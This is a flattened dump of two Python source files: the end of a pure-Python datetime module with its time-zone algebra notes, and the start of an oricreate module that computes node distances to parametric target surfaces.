# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
t += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = converter(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
result = cls(y, m, d, hh, mm, ss, us, tz)
if tz is not None:
result = tz.fromutc(result)
return result
@classmethod
def utcfromtimestamp(cls, t):
"Construct a UTC datetime from a POSIX timestamp (like time.time())."
t, frac = divmod(t, 1.0)
us = int(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
t += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = _time.gmtime(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us)
# XXX This is supposed to do better than we *can* do by using time.time(),
# XXX if the platform supports a more accurate way. The C implementation
# XXX uses gettimeofday on platforms that have it, but that isn't
# XXX available from Python. So now() may return different results
# XXX across the implementations.
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self.dst()
if dst is None:
dst = -1
elif dst:
dst = 1
else:
dst = 0
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def timestamp(self):
"Return POSIX timestamp as float"
if self._tzinfo is None:
return _time.mktime((self.year, self.month, self.day,
self.hour, self.minute, self.second,
-1, -1, -1)) + self.microsecond / 1e6
else:
return (self - _EPOCH).total_seconds()
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
offset = self.utcoffset()
if offset:
self -= offset
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
_check_date_fields(year, month, day)
_check_time_fields(hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
return datetime(year, month, day, hour, minute, second,
microsecond, tzinfo)
def astimezone(self, tz=None):
if tz is None:
if self.tzinfo is None:
raise ValueError("astimezone() requires an aware datetime")
ts = (self - _EPOCH) // timedelta(seconds=1)
localtm = _time.localtime(ts)
local = datetime(*localtm[:6])
try:
# Extract TZ data if available
gmtoff = localtm.tm_gmtoff
zone = localtm.tm_zone
except AttributeError:
# Compute UTC offset and compare with the value implied
# by tm_isdst. If the values match, use the zone name
# implied by tm_isdst.
delta = local - datetime(*_time.gmtime(ts)[:6])
dst = _time.daylight and localtm.tm_isdst > 0
gmtoff = -(_time.altzone if dst else _time.timezone)
if delta == timedelta(seconds=gmtoff):
tz = timezone(delta, _time.tzname[dst])
else:
tz = timezone(delta)
else:
tz = timezone(timedelta(seconds=gmtoff), zone)
elif not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day,
sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = ", ".join(map(str, L))
s = "%s(%s)" % ('datetime.' + self.__class__.__name__, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
@classmethod
def strptime(cls, date_string, format):
'string, format -> new datetime parsed from a string (like time.strptime()).'
import _strptime
return _strptime._strptime_datetime(cls, date_string, format)
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
name = _call_tzinfo_method(self._tzinfo, "tzname", self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
_check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) == 0
elif not isinstance(other, date):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) != 0
elif not isinstance(other, date):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
delta = timedelta(self.toordinal(),
hours=self._hour,
minutes=self._minute,
seconds=self._second,
microseconds=self._microsecond)
delta += other
hour, rem = divmod(delta.seconds, 3600)
minute, second = divmod(rem, 60)
if 0 < delta.days <= _MAXORDINAL:
return datetime.combine(date.fromordinal(delta.days),
time(hour, minute, second,
delta.microseconds,
tzinfo=self._tzinfo))
raise OverflowError("result out of range")
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self + -other
return NotImplemented
days1 = self.toordinal()
days2 = other.toordinal()
secs1 = self._second + self._minute * 60 + self._hour * 3600
secs2 = other._second + other._minute * 60 + other._hour * 3600
base = timedelta(days1 - days2,
secs1 - secs2,
self._microsecond - other._microsecond)
if self._tzinfo is other._tzinfo:
return base
myoff = self.utcoffset()
otoff = other.utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("cannot mix naive and timezone-aware time")
return base + otoff - myoff
def __hash__(self):
tzoff = self.utcoffset()
if tzoff is None:
return hash(self._getstate()[0])
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + self.minute * 60 + self.second
return hash(timedelta(days, seconds, self.microsecond) - tzoff)
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = string
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
if tzinfo is None or isinstance(tzinfo, _tzinfo_class):
self._tzinfo = tzinfo
else:
raise TypeError("bad tzinfo state arg %r" % tzinfo)
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
class timezone(tzinfo):
__slots__ = '_offset', '_name'
# Sentinel value to disallow None
_Omitted = object()
def __new__(cls, offset, name=_Omitted):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
if name is cls._Omitted:
if not offset:
return cls.utc
name = None
elif not isinstance(name, str):
raise TypeError("name must be a string")
if not cls._minoffset <= offset <= cls._maxoffset:
raise ValueError("offset must be a timedelta"
" strictly between -timedelta(hours=24) and"
" timedelta(hours=24).")
if (offset.microseconds != 0 or
offset.seconds % 60 != 0):
raise ValueError("offset must be a timedelta"
" representing a whole number of minutes")
return cls._create(offset, name)
@classmethod
def _create(cls, offset, name=None):
self = tzinfo.__new__(cls)
self._offset = offset
self._name = name
return self
def __getinitargs__(self):
"""pickle support"""
if self._name is None:
return (self._offset,)
return (self._offset, self._name)
def __eq__(self, other):
if type(other) != timezone:
return False
return self._offset == other._offset
def __hash__(self):
return hash(self._offset)
def __repr__(self):
"""Convert to formal string, for repr().
>>> tz = timezone.utc
>>> repr(tz)
'datetime.timezone.utc'
>>> tz = timezone(timedelta(hours=-5), 'EST')
>>> repr(tz)
"datetime.timezone(datetime.timedelta(-1, 68400), 'EST')"
"""
if self is self.utc:
return 'datetime.timezone.utc'
if self._name is None:
return "%s(%r)" % ('datetime.' + self.__class__.__name__,
self._offset)
return "%s(%r, %r)" % ('datetime.' + self.__class__.__name__,
self._offset, self._name)
def __str__(self):
return self.tzname(None)
def utcoffset(self, dt):
if isinstance(dt, datetime) or dt is None:
return self._offset
raise TypeError("utcoffset() argument must be a datetime instance"
" or None")
def tzname(self, dt):
if isinstance(dt, datetime) or dt is None:
if self._name is None:
return self._name_from_offset(self._offset)
return self._name
raise TypeError("tzname() argument must be a datetime instance"
" or None")
def dst(self, dt):
if isinstance(dt, datetime) or dt is None:
return None
raise TypeError("dst() argument must be a datetime instance"
" or None")
def fromutc(self, dt):
if isinstance(dt, datetime):
if dt.tzinfo is not self:
raise ValueError("fromutc: dt.tzinfo "
"is not self")
return dt + self._offset
raise TypeError("fromutc() argument must be a datetime instance"
" or None")
_maxoffset = timedelta(hours=23, minutes=59)
_minoffset = -_maxoffset
@staticmethod
def _name_from_offset(delta):
if delta < timedelta(0):
sign = '-'
delta = -delta
else:
sign = '+'
hours, rest = divmod(delta, timedelta(hours=1))
minutes = rest // timedelta(minutes=1)
return 'UTC{}{:02d}:{:02d}'.format(sign, hours, minutes)
timezone.utc = timezone._create(timedelta(0))
timezone.min = timezone._create(timezone._minoffset)
timezone.max = timezone._create(timezone._maxoffset)
_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and that datimetimetz+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back at look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y are have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'd differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belong to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst()). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
"""
#brython does not have a _datetime, so lets comment this out for now.
#try:
# from _datetime import *
#except ImportError:
# pass
#else:
# # Clean up unused names
# del (_DAYNAMES, _DAYS_BEFORE_MONTH, _DAYS_IN_MONTH,
# _DI100Y, _DI400Y, _DI4Y, _MAXORDINAL, _MONTHNAMES,
# _build_struct_time, _call_tzinfo_method, _check_date_fields,
# _check_time_fields, _check_tzinfo_arg, _check_tzname,
# _check_utc_offset, _cmp, _cmperror, _date_class, _days_before_month,
# _days_before_year, _days_in_month, _format_time, _is_leap,
# _isoweek1monday, _math, _ord2ymd, _time, _time_class, _tzinfo_class,
# _wrap_strftime, _ymd2ord)
# # XXX Since import * above excludes names that start with _,
# # docstring does not get overwritten. In the future, it may be
# # appropriate to maintain a single module level docstring and
# # remove the following line.
# #from _datetime import __doc__
| gpl-3.0 |
simvisage/oricreate | oricreate/fu/fu_target_face.py | 1 | 13873 | # -------------------------------------------------------------------------
#
# Copyright (c) 2009, IMB, RWTH Aachen.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in simvisage/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.simvisage.com/licenses/BSD.txt
#
# Thanks for using Simvisage open source!
#
# Created on Nov 18, 2011 by: rch
from scipy.optimize import fsolve
from traits.api import \
provides, HasTraits, List, \
Property, cached_property, Any,\
DelegatesTo, Float, Str, Array, \
Instance
import numpy as np
from oricreate.fu.fu_target_face_viz3d import \
FuTargetFaceViz3D
from oricreate.opt import \
IFu
from oricreate.util import \
x_, y_, z_, r_, s_, t_
from oricreate.viz3d import \
Visual3D
import sympy as sm
from .fu import \
Fu
class ParamFaceOperator(HasTraits):
'''
Parametric definition of a surface in 3D space
providing the operators for maintaining the normal
projection from a point x_pnt := [x_, y_, z_]
onto the surface point r_pnt := [r_, s_].
'''
# =========================================================================
# Point in R**3
# =========================================================================
X = Any
def _X_default(self):
return sm.Matrix([x_, y_, z_])
# =========================================================================
# Parametric surface F(r,s)
# =========================================================================
F = List(input=True)
def _F_default(self):
return [r_, s_, -r_ ** 2 - s_ ** 2 * t_]
F_mtx = Property(depends_on='F')
@cached_property
def _get_F_mtx(self):
return sm.Matrix(self.F)
F_fn = Property(depends_on='F')
@cached_property
def _get_F_fn(self):
return sm.lambdify([r_, s_, t_], list(self.F_mtx))
def get_F(self, r_pnt, t):
args = np.hstack([r_pnt, [t]])
return self.F_fn(*args)
# =========================================================================
# Surface derivatives [dF(r,s)/dr, dF(r,s)/ds]
# =========================================================================
dF_rs = Property(depends_on='F')
@cached_property
def _get_dF_rs(self):
return np.vstack([[sm.diff(x, var_) for x in self.F]
for var_ in [r_, s_]])
dF_rs_fn = Property(depends_on='F')
@cached_property
def _get_dF_rs_fn(self):
dF_rs = [[sm.diff(x, var_) for x in self.F] for var_ in [r_, s_]]
return sm.lambdify([r_, s_, t_], dF_rs)
def get_dF_rs(self, r_pnt, t):
args = np.hstack([r_pnt, [t]])
return self.dF_rs_fn(*args)
# =========================================================================
# normal vector
# =========================================================================
ls = Property(depends_on='+input')
@cached_property
def _get_ls(self):
'''Calculate the projections of the vector X -> F onto
the plane tangent vectors of the surface.
'''
# derivatives with respect to r and s
dF_r, dF_s = self.dF_rs
n_vct = np.cross(dF_r, dF_s)
# F -> X vector
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
return np.dot(n_vct, XF_vct)
ls_fn = Property(depends_on='+input')
@cached_property
def _get_ls_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.ls)
def get_ls(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.ls_fn(*args)
# =========================================================================
# normality condition
# =========================================================================
norm_cond = Property(depends_on='+input')
@cached_property
def _get_norm_cond(self):
'''Calculate the projections of the vector X -> F onto
the plane tangent vectors of the surface.
'''
# derivatives with respect to r and s
dF_s, dF_r = self.dF_rs
# F -> X vector
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
# projections of the XF vector onto tangent vectors
pr = np.inner(XF_vct, dF_r)
ps = np.inner(XF_vct, dF_s)
return [pr, ps]
norm_cond_fn = Property(depends_on='+input')
@cached_property
def _get_norm_cond_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.norm_cond)
def get_norm_cond(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.norm_cond_fn(*args)
# =========================================================================
# Derivative of the norm_condity condition
# =========================================================================
d_norm_cond = Property(depends_on='+input')
@cached_property
def _get_d_norm_cond(self):
return [[sm.diff(x, var_) for x in self.norm_cond] for
var_ in [r_, s_]]
d_norm_cond_fn = Property(depends_on='+input')
@cached_property
def _get_d_norm_cond_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.d_norm_cond)
def get_d_norm_cond(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.d_norm_cond_fn(*args)
def get_r_pnt(self, r0_pnt, x_pnt, t):
'''Get the parametric coordinates of a nearest point on a surface.
'''
def get_norm_cond(r_pnt): return self.get_norm_cond(r_pnt, x_pnt, t)
def get_d_norm_cond(
r_pnt): return self.get_d_norm_cond(r_pnt, x_pnt, t)
r_pnt, infodict, ier, m = fsolve(get_norm_cond, # @UnusedVariable
r0_pnt,
fprime=get_d_norm_cond,
full_output=True)
return r_pnt
# =========================================================================
# Distance operator
# =========================================================================
def get_dist(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, [t]])
return np.linalg.norm(x_pnt - self.F_fn(*args))
# =========================================================================
# Get Derivative of Distance of X to F with respect to X
# =========================================================================
d_dist_xyz = Property(depends_on='+input')
@cached_property
def _get_d_dist_xyz(self):
'''Calculate the derivatives of the distance
with respect to nodal coordinates X.
'''
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
XF2_vct = sm.sqrt(np.dot(XF_vct, XF_vct))
dXF_vct = [sm.diff(XF2_vct, var_) for var_ in [x_, y_, z_]]
return dXF_vct
d_dist_xyz_fn = Property(depends_on='+input')
@cached_property
def _get_d_dist_xyz_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.d_dist_xyz)
def get_d_dist_xyz(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.d_dist_xyz_fn(*args)
class FuFaceNodeDistance(HasTraits):
'''Calculate and maintain distances between
a set of points X_arr and parametrically
defined surface F.
'''
name = Str('<noname>')
pf_operator = Instance(ParamFaceOperator)
'''Operators on a parametric surface
'''
def _pf_operator_default(self):
return ParamFaceOperator()
F = DelegatesTo('pf_operator')
t = Float(0.0, input=True)
X_arr = Array(float, input=True)
'''Input coordinates of nodes for the evaluation of the
closest point projection.
'''
def _X_arr_default(self):
return np.array([[0, 0, 1]], dtype='f')
r_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Closest point projection of X points to the target surface.
'''
@cached_property
def _get_r_arr(self):
r0_pnt = np.array([0, 0], dtype='f')
return np.array([self.pf_operator.get_r_pnt(r0_pnt, x_pnt, self.t)
for x_pnt in self.X_arr], dtype='f')
d_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Distance from the target surface.
'''
@cached_property
def _get_d_arr(self):
return np.array([self.pf_operator.get_dist(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
d_xyz_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Gradient of the distance from the target surface.
'''
@cached_property
def _get_d_xyz_arr(self):
return np.array([self.pf_operator.get_d_dist_xyz(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
ls_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Level set representation of the surface - used for visualization.
'''
@cached_property
def _get_ls_arr(self):
return np.array([self.pf_operator.get_ls(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
def Rf(self, x, y, z, t):
'''Evaluate the distance from the surface for all points in x, y, z and time t
'''
self.X_arr = np.c_[x.flatten(), y.flatten(), z.flatten()]
self.t = t
ls_arr = self.ls_arr
return ls_arr.reshape(x.shape)
class FuTargetFace(Fu, Visual3D):
'''Target face linked with a set of nodes.
'''
control_face = Instance(FuFaceNodeDistance)
nodes = Array(int, value=[])
viz3d_classes = dict(default=FuTargetFaceViz3D)
def FuTF(expr, nodes):
return FuTargetFace(control_face=FuFaceNodeDistance(F=expr),
nodes=nodes)
@provides(IFu)
class FuTargetFaces(Fu, Visual3D):
'''Container of target faces
'''
tf_lst = List([])
target_faces = Property
def _new_fu_target_face(self, value):
return FuTargetFace(forming_task=self.forming_task,
control_face=FuFaceNodeDistance(F=value[0]),
nodes=value[1])
def _set_target_faces(self, values):
self.tf_lst = [self._new_fu_target_face(value)
for value in values]
def _get_target_faces(self):
return self.tf_lst
def __setitem__(self, idx, value):
self.tf_lst[idx] = self._new_fu_target_face(value)
def append(self, value):
self.tf_lst.append(self._new_fu_target_face(value))
def __getitem__(self, idx):
return self.tf_lst[idx]
def get_f(self, t=0):
'''Get the the norm of distances between the individual target faces and nodes.
'''
x = self.forming_task.formed_object.x
d_arr = np.array([])
for tf in self.target_faces:
tf.control_face.X_arr = x[tf.nodes]
tf.control_face.t = t
d_arr = np.append(d_arr, tf.control_face.d_arr)
return np.linalg.norm(d_arr)
def get_f_du(self, t=0):
'''Get the derivatives with respect to individual displacements.
'''
x = self.forming_task.formed_object.x
d_xyz = np.zeros_like(x)
dist_arr = np.array([])
for tf in self.target_faces:
tf.control_face.X_arr = x[tf.nodes]
tf.control_face.t = t
d_arr = tf.control_face.d_arr
dist_arr = np.append(dist_arr, d_arr)
